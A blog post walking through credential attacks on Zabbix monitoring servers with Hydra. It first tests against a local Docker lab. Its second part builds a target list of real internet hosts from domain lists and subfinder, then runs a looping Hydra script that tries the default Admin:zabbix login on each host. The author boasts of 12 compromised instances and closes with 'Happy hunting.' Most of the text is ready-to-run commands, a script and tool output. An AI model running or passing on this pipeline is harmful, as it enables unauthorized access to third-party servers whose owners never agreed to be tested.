Taking over Zabbix with Hydra - ScienceChronicle
ScienceChronicle
May 22, 2024

Taking over Zabbix with Hydra

Posted on May 22, 2024  •  6 minutes  • 1117 words
Table of contents

Lab experiment

As usual, we start with an experiment in highly constrolled conditions - in our virtual lab.

Let’s first install hydra:

sudo apt install hydra -y

Then let’s run zabbix appliance to have all zabbix components run in a single command:

docker run --name some-zabbix-appliance -p 80:80 -p 10051:10051 -d zabbix/zabbix-appliance:tag

After docker ran, we can see exposed ports:

docker ps
CONTAINER ID   IMAGE                     COMMAND                  CREATED             STATUS             PORTS                                                                                       NAMES
3b0230770aa0   zabbix/zabbix-appliance   "/sbin/tini -- /usr/…"   About an hour ago   Up About an hour   0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:10051->10051/tcp, :::10051->10051/tcp, 443/tcp   some-zabbix-appliance

and we get into the UI by going with browser to http://localhost:

ui

Let’s login with default credentials, Admin:zabbix:

ui

Now, time to test hydra:

hydra -l Admin -p zabbix 127.0.0.1 http-post-form "/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:Login name or password is incorrect" -V

with the following results:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 13:21:43
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking http-post-form://127.0.0.1:80/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:Login name or password is incorrect
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "zabbix" - 1 of 1 [child 0] (0/0)
[80][http-post-form] host: 127.0.0.1   login: Admin   password: zabbix
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 13:21:44

What if we used an invalid password, e.g. zabbix1?

hydra -l Admin -p zabbix1 127.0.0.1 http-post-form "/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:Login name or password is incorrect" -V

prints

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 13:23:30
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking http-post-form://127.0.0.1:80/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:Login name or password is incorrect
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "zabbix1" - 1 of 1 [child 0] (0/0)
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 13:23:30

We’ll use SecLists for password lists:

git clone https://github.com/danielmiessler/SecLists.git

Let’s run hydra with SecLists/Passwords/Common-Credentials/10k-most-common.txt:

hydra -l Admin -P ../SecLists/Passwords/Common-Credentials/10k-most-common.txt 127.0.0.1 http-post-form "/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:Login name or password is incorrect" -V

Wow, we got an interesting result:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 13:36:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://127.0.0.1:80/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:Login name or password is incorrect
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "password" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "123456" - 2 of 10000 [child 1] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "12345678" - 3 of 10000 [child 2] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "1234" - 4 of 10000 [child 3] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "qwerty" - 5 of 10000 [child 4] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "12345" - 6 of 10000 [child 5] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "dragon" - 7 of 10000 [child 6] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "pussy" - 8 of 10000 [child 7] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "baseball" - 9 of 10000 [child 8] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "football" - 10 of 10000 [child 9] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "letmein" - 11 of 10000 [child 10] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "monkey" - 12 of 10000 [child 11] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "696969" - 13 of 10000 [child 12] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "abc123" - 14 of 10000 [child 13] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "mustang" - 15 of 10000 [child 14] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "michael" - 16 of 10000 [child 15] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "shadow" - 17 of 10000 [child 4] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "master" - 18 of 10000 [child 7] (0/0)
[ATTEMPT] target 127.0.0.1 - login "Admin" - pass "jennifer" - 19 of 10000 [child 6] (0/0)
[80][http-post-form] host: 127.0.0.1   login: Admin   password: 123456
[80][http-post-form] host: 127.0.0.1   login: Admin   password: michael
[80][http-post-form] host: 127.0.0.1   login: Admin   password: mustang
[80][http-post-form] host: 127.0.0.1   login: Admin   password: 12345678
[80][http-post-form] host: 127.0.0.1   login: Admin   password: abc123
[80][http-post-form] host: 127.0.0.1   login: Admin   password: 12345
[80][http-post-form] host: 127.0.0.1   login: Admin   password: baseball
[80][http-post-form] host: 127.0.0.1   login: Admin   password: password
[80][http-post-form] host: 127.0.0.1   login: Admin   password: monkey
[80][http-post-form] host: 127.0.0.1   login: Admin   password: 1234
[80][http-post-form] host: 127.0.0.1   login: Admin   password: letmein
[80][http-post-form] host: 127.0.0.1   login: Admin   password: football
[80][http-post-form] host: 127.0.0.1   login: Admin   password: 696969
[80][http-post-form] host: 127.0.0.1   login: Admin   password: shadow
[80][http-post-form] host: 127.0.0.1   login: Admin   password: master
[80][http-post-form] host: 127.0.0.1   login: Admin   password: jennifer
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 13:36:41

We got many matching passwords, e.g. 123456, michael, etc. Probably Zabbix hide something regarding their default password. Let’s go to the UI and check Admin:123456:

Account is blocked

Oops… Ok, now it’s clear. Zabbix blocked Admin after 19 insuccessful attempts and hydra did not uderstand its answer correctly because it did not find in the response Login name or password is incorrect: all Account is blocked for 30 seconds were interpreted as success.

Well, we have discovered Zabbix has an anti-bruteforce policy implemented and that makes our life hard. Therefore, we turn to a very simple and basic case of scanning of wild life zabbixes: we’ll try only default zabbix creds in hope the admin forgot to change them. We should also remember that hydra will report false positives for any errors which differ from Login name or password is incorrect.

Wild life

We want to identify zabbix services by domain names. Let’s first get domains from Kaeferjaegger.gay and grep domains out:

grep -E -o '[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+(\.[a-zA-Z]{2,})' ~/sni_ip_ranges/phatboi.txt > domains.txt

Then with subfinder let’s find the subdomains:

subfinder -dL domains.txt -silent -o subdomains.txt

and unite both domains and subdomains:

cat domains.txt subdomains.txt | sort | uniq > alldomains.txt

Let’s find zabbix-related ones:

grep 'zabbix' alldomains.txt > domains.zabbix

Now, create a small hydra runner:

#!/bin/bash
# test.sh
domain=$1
hydra -l Admin -p zabbix $domain http-post-form "/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:Login name or password is incorrect" -V

And finally run the test:

chmod +x test.sh
while read -r line
do
	test.sh $line
done  < domains.zabbix

In our test we were able to find 12 zabbix instances with default credentials. Not bad at all!

Happy hunting.


Share


Tags


Counters

Support us

Science Chronicle